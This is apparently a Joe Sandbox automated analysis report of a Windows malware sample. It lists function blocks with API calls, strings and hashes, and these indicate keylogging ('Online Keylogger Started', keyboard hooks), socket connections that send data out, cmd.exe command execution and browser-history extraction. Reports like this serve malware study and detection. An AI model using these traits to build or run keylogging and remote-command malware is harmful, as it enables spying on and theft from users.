                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                  • String ID:
                                                  • API String ID: 2951400881-0
                                                  • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                  • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                  • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                  • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                  APIs
                                                  • _free.LIBCMT ref: 0044F7B5
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                  • _free.LIBCMT ref: 0044F7C7
                                                  • _free.LIBCMT ref: 0044F7D9
                                                  • _free.LIBCMT ref: 0044F7EB
                                                  • _free.LIBCMT ref: 0044F7FD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                  • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                  • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                  • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                  APIs
                                                  • _free.LIBCMT ref: 00443305
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                  • _free.LIBCMT ref: 00443317
                                                  • _free.LIBCMT ref: 0044332A
                                                  • _free.LIBCMT ref: 0044333B
                                                  • _free.LIBCMT ref: 0044334C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                  • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                  • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                  • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                  APIs
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                  • IsWindowVisible.USER32(?), ref: 004167A1
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessWindow$Open$TextThreadVisible
                                                  • String ID: (FG
                                                  • API String ID: 3142014140-2273637114
                                                  • Opcode ID: 92bcab0c5e250d577a7545fc527d6642a8e7c755569237cd88e9487c31cb9e3a
                                                  • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                  • Opcode Fuzzy Hash: 92bcab0c5e250d577a7545fc527d6642a8e7c755569237cd88e9487c31cb9e3a
                                                  • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0044D4A8
                                                  • _free.LIBCMT ref: 0044D5C5
                                                    • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                    • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
                                                    • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                  • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                  • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                  • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                    • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                    • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                    • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                  • String ID: XCG$`AG$>G
                                                  • API String ID: 2334542088-2372832151
                                                  • Opcode ID: fdaeb450b9f26cf0cb0644add526e4df46bbe067ddd4809fd7c936370ec1967d
                                                  • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                  • Opcode Fuzzy Hash: fdaeb450b9f26cf0cb0644add526e4df46bbe067ddd4809fd7c936370ec1967d
                                                  • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,774D3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                  • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "$8>G
                                                  • API String ID: 368326130-2663660666
                                                  • Opcode ID: 9d96a54a1925a8b1eace83d3547fca86d512ab199cc1980e28a357fa7c7b1cc2
                                                  • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                  • Opcode Fuzzy Hash: 9d96a54a1925a8b1eace83d3547fca86d512ab199cc1980e28a357fa7c7b1cc2
                                                  • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                  • wsprintfW.USER32 ref: 0040A905
                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                  • API String ID: 1497725170-1359877963
                                                  • Opcode ID: ba7ddda832803808cbfe6e4fced7d86aab764d3b23e4f9a5d1baf008580cd9ea
                                                  • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                  • Opcode Fuzzy Hash: ba7ddda832803808cbfe6e4fced7d86aab764d3b23e4f9a5d1baf008580cd9ea
                                                  • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                  APIs
                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                  • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                  • String ID: Online Keylogger Started
                                                  • API String ID: 112202259-1258561607
                                                  • Opcode ID: 74bbf1dd48c5cc06e207f48c4eb53604144d0a493703acba44df512efce14c16
                                                  • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                  • Opcode Fuzzy Hash: 74bbf1dd48c5cc06e207f48c4eb53604144d0a493703acba44df512efce14c16
                                                  • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: TUF$alarm.wav$xIG
                                                  • API String ID: 1174141254-2188790166
                                                  • Opcode ID: 981f797dff14b795d1c6a23a00ada2650f668d820811c35d664c333715d2723a
                                                  • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                  • Opcode Fuzzy Hash: 981f797dff14b795d1c6a23a00ada2650f668d820811c35d664c333715d2723a
                                                  • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                  • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                  • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  • API String ID: 2055531096-499159329
                                                  • Opcode ID: 021faa9111ab8834074a9e6104490ab3bec6bd23ae7819230539afb67bbeabe2
                                                  • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                  • Opcode Fuzzy Hash: 021faa9111ab8834074a9e6104490ab3bec6bd23ae7819230539afb67bbeabe2
                                                  • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                    • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                    • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                  • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                  • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                  • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: ee6d09c7a5be61fc2c77f0fe381f15b1933766d643093560b744fac4f5f657b7
                                                  • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                  • Opcode Fuzzy Hash: ee6d09c7a5be61fc2c77f0fe381f15b1933766d643093560b744fac4f5f657b7
                                                  • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                  APIs
                                                  • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                  • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                  • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: TerminateThread$HookUnhookWindows
                                                  • String ID: pth_unenc
                                                  • API String ID: 3123878439-4028850238
                                                  • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                  • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                  • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                  • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                  • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                  • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                  • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                  • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                  • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                  • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
